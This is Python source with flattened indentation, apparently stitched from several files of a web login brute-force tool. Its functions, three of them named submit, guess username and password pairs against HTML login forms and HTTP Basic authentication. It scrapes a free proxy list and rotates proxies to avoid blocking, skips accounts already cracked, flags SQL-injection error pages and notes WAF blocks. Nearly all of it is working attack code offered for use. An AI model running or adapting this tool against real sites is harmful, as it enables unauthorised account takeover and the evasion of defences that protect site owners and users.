def submit(url, options, tryCreds, result):
try:
proc = startBrowser(options.timeout)
printf("[+] Checking %s" %(url))
proc.open(url)
loginInfo = parseLoginForm(proc.forms())
except Exception as err:
if options.verbose:
printf("[x] ReAuth: %s at %s" %(err, url), "bad")
if not loginInfo:
if options.verbose:
printf("[x] ReAuth: Can't find login form at %s" %(url), "bad")
else:
try:
options.url = url
loginbrute.submit(
# Reverse username + password. Dynamic submit in loginbrute
options, loginInfo, tryCreds[-2:][::-1], result
)
except Exception as err:
if options.verbose:
printf("[x] ReAuth: Submitting error for %s" %(err), "bad")
def submit(options, loginInfo, creds, result):
tryPassword, tryUsername = creds
realm = loginInfo[0]
for cred in list(result.queue):
if tryUsername == cred[0]:
return True # don't run if find password of username
if options.verbose:
printf("[+] Trying: %s:%s" % (tryUsername, tryPassword), 'norm')
try:
proc = startBrowser(options.timeout)
proc.add_password(options.url, tryUsername, tryPassword, realm)
proc.open(options.url)
try:
proc.open(options.url)
# printf("[*] Page title: ['%s']" %(proc.title()), "good")
printf("[*] %s [%s]" % ([tryUsername, tryPassword], proc.title()),
"good")
result.put([options.url, tryUsername, tryPassword])
# printf("[*] Match found: %s" %([tryUsername, tryPassword]), "good")
except Exception as err:
try:
if err.code == 401:
if options.verbose:
printf("[-] Failed %s" % (creds[::-1]), "bad")
else:
printf("[x] %s: %s" % (err, creds[::-1]), "bad")
except:
die("[x] HTTP GET:", err)
except:
if options.verbose:
printf("[x] Failed!", "bad")
def check_login(opts):
try:
proc = startBrowser(options.timeout)
proc.open(opts.url)
"""
Check URL type. If Website directs to other URL,
options.url is website's panel
else: it is login url.
Example: options.url = site.com/wp-admin/ -> panel
site directs user to wp-login -> login URL
options.url = site.com/wp-login.php -> login URL
"""
if proc.geturl() != opts.url:
printf("[*] Website moves to: ['%s']" % (proc.geturl()), "norm")
opts.panel_url, opts.login_url = opts.url, proc.geturl()
else:
opts.login_url = opts.url
# printf("[*] Connect success!", "good")
options.attack_mode = "--loginbrute"
if opts.run_options["--verbose"]:
printf("[*] %s" % (proc.title()), "norm")
# printf("[+] Analyzing login form....")
loginInfo = parseLoginForm(proc.forms())
return loginInfo
except Exception as error:
try:
if error.code == 401:
## GET INFORMATION
resp_header = str(proc.response().info())
if "WWW-Authenticate" in resp_header:
loginID = checkHTTPGetLogin(resp_header)
loginInfo = (loginID, ["Password", "User Name"])
if options.verbose:
printf("[+] Using HTTP GET Authentication mode",
"norm")
options.attack_mode = "--httpget"
else:
loginInfo = False
else:
loginInfo = False
printf("[x] Target check: %s" % (error), "bad")
# Error != http code
except:
loginInfo = False
die("[x] Target check:", error)
except KeyboardInterrupt:
loginInfo = False
finally:
proc.close()
return loginInfo
def checProxyConnProvider(url="https://free-proxy-list.net/"):
try:
printf("[+] Getting proxy list from %s" % (url))
getproxy = startBrowser(options.timeout)
getproxy.open(url)
printf("[*] Gathering proxies completed.", "good")
return getproxy.response().read()
except Exception as error:
die("[x] GetProxy: Error while connecting to proxy server!", error)
finally:
getproxy.close()
def checProxyConn(proxyAddr, target, result, verbose):
try:
proxyTest = startBrowser(options.timeout)
proxyTest.set_proxies({"http": proxyAddr})
if verbose:
printf("[+] Trying: %s" % (proxyAddr))
proxyTest.open(options.url)
if verbose:
printf("[*] Success: %s" % (proxyAddr), "good")
result.put(proxyAddr)
except Exception as error:
if verbose:
printf("[x] %s %s" % (proxyAddr, error), "bad")
finally:
try:
proxyTest.close()
except:
pass
def submit(options, loginInfo, tryCred, result):
# Get login form field informations
# frmLoginID, frmFields = loginInfo
tryPassword, tryUsername = tryCred
proc = startBrowser()
for cred in list(result.queue):
if tryUsername == cred[1]:
return True
if options.proxy:
# Set proxy connect
proxyAddr = randomFromList(options.proxy)
proc.set_proxies({"http": proxyAddr})
try:
proc.open(options.login_url)
_form = parseLoginForm(proc.forms())
if not _form:
if options.verbose:
printf("[x] LoginBrute: No login form found. Possibly get blocked!")
return False
else:
frmLoginID, frmFields = _form
frmUsername, _ = frmFields
if options.verbose and loginInfo != _form:
printf("[+] Warning: Form field has been changed!")
# Select login form
proc.select_form(nr = frmLoginID)
# FILLS ALL FIELDS https://stackoverflow.com/a/5389578
proc.form[frmUsername] = tryUsername
proc.submit()
_, _, frmPasswd = parseLoginForm(proc.forms())
proc.form[frmPasswd] = tryPassword
proc.submit()
# page_title = proc.title()
# Send request
if options.verbose:
if options.proxy:
printf("[+] Trying: %s through %s" %([tryUsername, tryPassword],proxyAddr), 'norm')
else:
printf("[+] Trying: %s" %([tryUsername, tryPassword]), 'norm')
# Reload the browser. For javascript redirection and others...
# proc.reload()
# If no login form -> maybe success. Check conditions
if not parseLoginForm(proc.forms()):# != loginInfo:
test_result = check_condition(options, proc, loginInfo)
if test_result == 1:
printf("[*] Page title: ['%s']" %(proc.title()), "good")
# "If we tried login form with username+password field"
if tryUsername:
printf("[*] Found: %s" %([tryUsername, tryPassword]), "good")
# "Else If we tried login form with password field only"
else:
printf("[*] Found: %s" %([tryPassword]), "good")
result.put([options.url, tryUsername, tryPassword])
elif test_result == 2 and options.verbose:
printf("[+] SQL Injection vulnerable found")
printf(" %s" %([tryUsername, tryPassword]), "norm")
else:
# Possibly Error. But sometime it is true
if options.verbose:
printf("[x] Get error page: %s" %([tryUsername, tryPassword]), "bad")
printf(" [x] Page title: ['%s']" %(proc.title()), "bad")
# "Login form is still there. Oops"
else:
# TODO test if web has similar text (static)
if sqlerror(proc.response().read()) and options.verbose:
printf("[+] SQL Injection vulnerable found")
printf(" %s" %([tryUsername, tryPassword]), "norm")
if options.verbose:
if options.proxy:
printf(
"[-] Failed: %s through %s" %([tryUsername, tryPassword], proxyAddr),
"bad"
)
else:
printf(
"[-] Failed: %s" %([tryUsername, tryPassword]),
"bad"
)
return True
except Exception as error:
"""
Sometimes, web servers return error code because of bad configurations,
but our cred is true.
This code block showing information, for special cases
"""
try:
# Unauthenticated
if error.code == 401:
if options.verbose:
printf("[-] Failed: %s" %([tryUsername, tryPassword]), "bad")
# Server misconfiguration? Panel URL is deleted or wrong
elif error.code == 404:
printf("[x] %s: %s" %(error, tryCred[::-1]), "bad")
if options.verbose:
printf(" %s" %(proc.url()), "bad")
# Other error code
else:
if options.verbose:
printf("[x] (%s): %s" %(proc.url(), tryCred[::-1]), "bad")
except:
# THIS BLOCKED BY WAF
printf("[x] Loginbrute: %s" %(error), "bad")
return False
finally:
proc.close()